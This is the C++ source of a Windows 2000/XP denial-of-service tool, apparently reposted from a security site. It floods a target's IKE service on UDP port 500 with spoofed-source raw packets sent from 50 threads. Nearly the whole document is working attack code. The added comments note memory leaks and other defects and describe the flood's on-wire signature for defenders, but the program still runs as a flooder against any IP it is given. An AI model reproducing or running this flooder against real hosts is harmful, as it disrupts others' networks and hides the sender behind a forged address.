WIN2K中的 IKE(UDP 500)DOS代码
/ns/wz/comp/data/20020819052518.htm
					////////////////////////////////////////////////////////////////////////////////
//      
//      Win2K IKE UDP DOS (PORT 500)
//      
//      File      : IKEDOS.cpp
//      Comment   : only for win2k and XP(pro\server\adv)
//      
//      Create by : refdom
//		Email	  : refdom@263.net
//		Home Page : www.opengram.com
////////////////////////////////////////////////////////////////////////////////
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment (lib, "ws2_32.lib")
#define SOURCE_PORT 7900
#define IKE_UDPPORT 500
#define FAKE_SOURCE_IP "192.168.1.1"
// IPv4 header as laid out on the wire. The fields are naturally aligned, so
// the struct is 20 bytes without a pack pragma; IKEDOSThread derives the
// header-length nibble from sizeof(IP_HEADER) / sizeof(unsigned long)
// (5 where unsigned long is 4 bytes, as on Win32).
typedef struct ip_hdr			// IPv4 header
{
unsigned char h_verlen;			// 4-bit version, 4-bit header length in 32-bit words
unsigned char tos;				// 8-bit type of service
unsigned short total_len;		// 16-bit total length in bytes (network order)
unsigned short ident;			// 16-bit identification
unsigned short frag_and_flags;	// 3-bit flags and 13-bit fragment offset
unsigned char ttl;				// 8-bit time to live
unsigned char proto;			// 8-bit protocol (TCP, UDP or other)
unsigned short checksum;		// 16-bit header checksum
unsigned int sourceIP;			// 32-bit source address (network order)
unsigned int destIP;			// 32-bit destination address (network order)
}IP_HEADER;
// UDP header (8 bytes). All fields are stored in network byte order by
// IKEDOSThread; udp_length covers header plus payload.
typedef struct udp_hdr			// UDP header
{
    unsigned short sourceport;		// 16-bit source port
    unsigned short destport;		// 16-bit destination port
    unsigned short udp_length;		// 16-bit length of header + payload
    unsigned short udp_checksum;	// 16-bit checksum over pseudo-header + header + payload
} UDP_HEADER;
// Worker thread entry used with _beginthread; Target is the argv[1] string
// (defined below, after main).
void IKEDOSThread(void* Target);
// checksum: helper that computes the one's-complement checksum
// Standard one's-complement (RFC 1071 style) checksum over `size` bytes
// starting at `buffer`. Used here for the UDP checksum over
// pseudo-header + UDP header + payload. A trailing odd byte is folded in as
// the low byte of a word (matches the wire layout on little-endian hosts).
// Returns the 16-bit complement of the folded sum; an empty buffer yields
// 0xFFFF. `size` is signed: a value <= 1 but non-zero still reads one byte.
USHORT checksum(USHORT *buffer, int size) 
{ 
	unsigned long acc = 0;
	int remaining = size;
	// Accumulate whole 16-bit words.
	for (; remaining > 1; remaining -= (int)sizeof(USHORT))
	{
		acc += *buffer;
		buffer++;
	}
	// Fold in a trailing odd byte, if any is left.
	if (remaining != 0)
	{
		acc += *(const UCHAR*)buffer;
	}
	// Fold the carry bits back into 16 bits; the first fold can itself carry,
	// hence the second addition.
	acc = (acc >> 16) + (acc & 0xffff);
	acc = acc + (acc >> 16);
	return (USHORT)(~acc);
}
// Program entry point. argv[1] is the target address string; it is handed
// verbatim (neither validated nor copied) to each of the 50 worker threads
// started below. Returns 0 on every path, including the usage and
// WSAStartup-failure exits. The workers are never joined: the process
// sleeps for 100 s and then calls WSACleanup regardless of whether they
// have finished.
int main(int argc, char* argv[])
{
	WSADATA wsaData;
	const int kWorkerCount = 50;
	if (argc < 2)
	{
		printf ("input targetip!\n");
		return 0;
	}
	// Winsock 2.2 must be up before any worker opens a socket.
	if (0 != WSAStartup(MAKEWORD(2,2), &wsaData))
	{
		printf("WSA Error!\n");
		return 0;
	}
	Sleep(500);
	printf ("DOS Starting......\n");
	int started = 0;
	while (started < kWorkerCount)
	{
		_beginthread(IKEDOSThread, 0, (void*) argv[1]);
		++started;
	}
	Sleep(100000);
	WSACleanup();
	return 0;
}
// Worker thread body (started by main() via _beginthread). Target is the
// argv[1] string, treated as a dotted IPv4 address.
//
// Builds one raw IPv4/UDP datagram and then sends that same datagram
// 50001 times: spoofed source FAKE_SOURCE_IP:SOURCE_PORT, destination
// Target:IKE_UDPPORT, 1024-byte payload of 'A'. Nothing is returned, so the
// caller never learns whether the thread succeeded.
//
// Review notes on defects visible in this body (left as the author wrote them):
//  - neither malloc() result is checked before use;
//  - pBuffer and pSendBuffer leak on every early return, and sock leaks on
//    the setsockopt and sendto failure returns;
//  - inet_addr(Target) is never checked for a parse failure;
//  - nRetCode and j are declared but unused (j belonged to the commented-out
//    loop below).
// From the defender's side the constants give a stable on-wire signature:
// fixed spoofed source address and port, UDP length 1032 (8 + 1024),
// identical all-'A' payload, destination UDP/500.
void IKEDOSThread(void* Target)
{
	SOCKET sock;
	SOCKADDR_IN addr_in;
	IP_HEADER ipHeader;
	UDP_HEADER udpHeader;
	int nRetCode;
	char* pBuffer;
	char* pSendBuffer;
	int nBufferSize = 1024;
	BOOL flag;
	int iTotalSize,iUdpCheckSumSize,i,j;
	char *ptr=NULL;
	pBuffer = (char*) malloc(nBufferSize);			// unchecked allocation
	FillMemory(pBuffer, nBufferSize, 'A');			// payload: 1024 bytes of 'A'
	pSendBuffer = (char*) malloc(nBufferSize + 60);	// unchecked; 60 spare bytes hold the 28 header bytes
	// Raw socket so the IP header assembled below is sent as supplied.
	sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
	if (sock==INVALID_SOCKET)
	{
		printf("socket Error!\n");
		return;		// pBuffer and pSendBuffer leak here
	}
	flag=true;
	// IP_HDRINCL: pSendBuffer is handed to the stack with the IP header included.
	if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
	{
		printf("setsockopt Error!\n");
		return;		// sock and both buffers leak here
	}
	iTotalSize=sizeof(ipHeader) + sizeof(udpHeader)+ nBufferSize;	// 20 + 8 + 1024 bytes on the wire
	// Version 4 in the high nibble, header length in 32-bit words in the low nibble.
	ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
	ipHeader.tos=0;
	ipHeader.total_len=htons(iTotalSize);
	ipHeader.ident=0;
	ipHeader.frag_and_flags=0;
	ipHeader.ttl=128;
	ipHeader.proto=IPPROTO_UDP;
	ipHeader.checksum=0;	// not computed here; presumably left for the stack to fill in -- confirm
	//ipHeader.sourceIP=inet_addr(argv[1]);
	ipHeader.destIP=inet_addr((char*)Target);	// result not checked for a parse failure
	udpHeader.sourceport = htons(SOURCE_PORT);
	udpHeader.destport = htons(IKE_UDPPORT);
	udpHeader.udp_length = htons(sizeof(udpHeader) + nBufferSize);	// 8 + 1024
	udpHeader.udp_checksum = 0;
	
	ptr = NULL;
	// Spoofed source address. htonl(ntohl(x)) is an identity, so this is
	// simply inet_addr(FAKE_SOURCE_IP).
	ipHeader.sourceIP = htonl(ntohl(inet_addr(FAKE_SOURCE_IP)));
	ZeroMemory(pSendBuffer, nBufferSize + 60);
	ptr = pSendBuffer;
	iUdpCheckSumSize=0;
	udpHeader.udp_checksum = 0;
	// pSendBuffer is first used as scratch space for the UDP checksum input:
	// pseudo-header (source IP, dest IP, zero byte, protocol, UDP length),
	// then the UDP header with a zero checksum field, then the payload.
	memcpy(ptr, &ipHeader.sourceIP, sizeof(ipHeader.sourceIP));
	ptr += sizeof(ipHeader.sourceIP);
	iUdpCheckSumSize += sizeof(ipHeader.sourceIP);
	memcpy(ptr, &ipHeader.destIP, sizeof(ipHeader.destIP));
	ptr += sizeof(ipHeader.destIP);
	iUdpCheckSumSize += sizeof(ipHeader.destIP);
	
	ptr++;				// the pseudo-header's reserved zero byte (buffer was zeroed above)
	iUdpCheckSumSize++;
	memcpy(ptr, &ipHeader.proto, sizeof(ipHeader.proto));
	ptr += sizeof(ipHeader.proto);
	iUdpCheckSumSize += sizeof(ipHeader.proto);
	memcpy(ptr, &udpHeader.udp_length, sizeof(udpHeader.udp_length));
	ptr += sizeof(udpHeader.udp_length);
	iUdpCheckSumSize += sizeof(udpHeader.udp_length);
	memcpy(ptr, &udpHeader, sizeof(udpHeader));
	ptr += sizeof(udpHeader);
	iUdpCheckSumSize += sizeof(udpHeader);
	
	memcpy(ptr, pBuffer, nBufferSize);
	iUdpCheckSumSize += nBufferSize;
	// UDP checksum over pseudo-header + header + payload (12 + 8 + 1024 bytes).
	udpHeader.udp_checksum=checksum((USHORT*)pSendBuffer,iUdpCheckSumSize);
	// sendto() still needs a destination sockaddr even though the IP header
	// already carries the destination.
	addr_in.sin_family=AF_INET;
	addr_in.sin_port=htons(IKE_UDPPORT);
	addr_in.sin_addr.S_un.S_addr=inet_addr((char*) Target);
//	for (j=0; j<=253; j++)
//	{
//		udpHeader.udp_checksum -= j;
//		ipHeader.sourceIP = htonl(ntohl(inet_addr(FAKE_SOURCE_IP)) + j);
		//ZeroMemory(sendbuf,sizeof(sendbuf));
		// The scratch layout is now overwritten with the real datagram:
		// IP header, UDP header (checksum filled in), payload.
		memcpy(pSendBuffer, &ipHeader, sizeof(ipHeader));
		memcpy(pSendBuffer + sizeof(ipHeader), &udpHeader, sizeof(udpHeader));
		memcpy(pSendBuffer + sizeof(ipHeader) + sizeof(udpHeader), pBuffer, nBufferSize);
		for ( i = 0 ; i <= 50000; i++)	// 50001 sends of the identical datagram
		{
			if (sendto(sock, pSendBuffer, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
			{
				printf("Send Error!\n");
				return;		// sock and both buffers leak here as well
			}
			else
			{
			//	printf("Send OK!\n");
			}
		}
//	}//end for
    closesocket(sock);
	free(pBuffer);
	free(pSendBuffer);
}